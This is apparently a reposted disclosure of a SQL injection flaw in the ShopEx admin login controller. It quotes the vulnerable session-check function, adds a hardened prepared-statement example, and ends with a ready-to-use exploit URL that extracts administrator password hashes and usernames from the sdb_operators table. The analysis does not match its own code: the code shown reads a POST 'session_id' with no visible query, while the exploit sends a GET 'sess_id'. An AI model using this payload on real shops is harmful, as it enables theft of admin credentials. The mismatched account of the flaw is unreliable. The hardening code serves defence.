SQL injection in the latest ShopEx admin backend page

Tracing the admin login verification flow in \shopex\core\admin\controller\ctl.passport.php:

[php]
// Admin session check as shipped (vulnerable code, shown unchanged in behaviour).
function certi_validate(){
    $cert = $this->system->loadModel('service/certificate');
    // session_id is taken straight from the POST body with no validation or escaping.
    $sess_id = $_POST['session_id'];

    $return = array();
    if($sess_id == $cert->get_sess()){
        $return = array(
            'res'  => 'succ',
            'msg'  => '',
            'info' => ''
        );

        echo json_encode($return);
    }else{
        $return = array(
            'res'  => 'fail',
            'msg'  => '000001',
            'info' => 'You have the different session!'
        );

        echo json_encode($return);
    }
}
[/php]
The sess_id parameter is not processed in any way when it is passed along; it is carried directly into the query.
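The defence is to keep attacker-controlled input out of the SQL text altogether. The following is an added example, not ShopEx code: it assumes a hypothetical `sessions(sess_id)` table (built in-memory here with SQLite), rejects any session id that is not an opaque alphanumeric token, and binds the value as a prepared-statement parameter so quotes and subqueries inside it are never parsed as SQL.

```php
<?php
// Added example (not ShopEx code): hardened session-id lookup.
// Assumes a table `sessions(sess_id TEXT)`; schema and rows are constructed below.

function is_well_formed_session_id(string $id): bool
{
    // Session ids are opaque tokens: enforce a strict charset and length
    // before the value gets anywhere near SQL.
    return (bool) preg_match('/^[A-Za-z0-9]{16,64}$/', $id);
}

function session_exists(PDO $db, string $id): bool
{
    if (!is_well_formed_session_id($id)) {
        return false;
    }
    // Bound parameter: the driver sends the value separately from the
    // statement text, so payloads like "1' and '1'='1" are compared literally.
    $stmt = $db->prepare('SELECT 1 FROM sessions WHERE sess_id = :id LIMIT 1');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchColumn() !== false;
}

function certi_validate_hardened(PDO $db, array $post): array
{
    // Coerce to string explicitly; arrays or missing keys become an empty id.
    $sess_id = isset($post['session_id']) && is_string($post['session_id'])
        ? $post['session_id']
        : '';

    if (session_exists($db, $sess_id)) {
        return ['res' => 'succ', 'msg' => '', 'info' => ''];
    }
    return ['res' => 'fail', 'msg' => '000001', 'info' => 'You have the different session!'];
}

// Constructed fixture: in-memory SQLite holding one valid session id.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE sessions (sess_id TEXT NOT NULL)');
$db->exec("INSERT INTO sessions (sess_id) VALUES ('a1b2c3d4e5f60718')");

// Legitimate id is accepted; an injection-shaped id fails the charset check
// and, even if it reached the query, would only be compared as a literal.
echo json_encode(certi_validate_hardened($db, ['session_id' => 'a1b2c3d4e5f60718'])), "\n";
echo json_encode(certi_validate_hardened($db, ['session_id' => "1' and '1'='1"])), "\n";
```

Run with `php hardened_session.php`; the first line reports `succ`, the second `fail`. The whitelist is a defence in depth: the prepared statement alone already prevents injection, and the charset check additionally gives a cheap point at which to log and alert on malformed session ids arriving at the admin login endpoint.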

The exploit (exp):
[php]http://www.0day5.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'='1[/php]

Note that this is not universal; it works on lower versions.
Please credit the source when reposting.
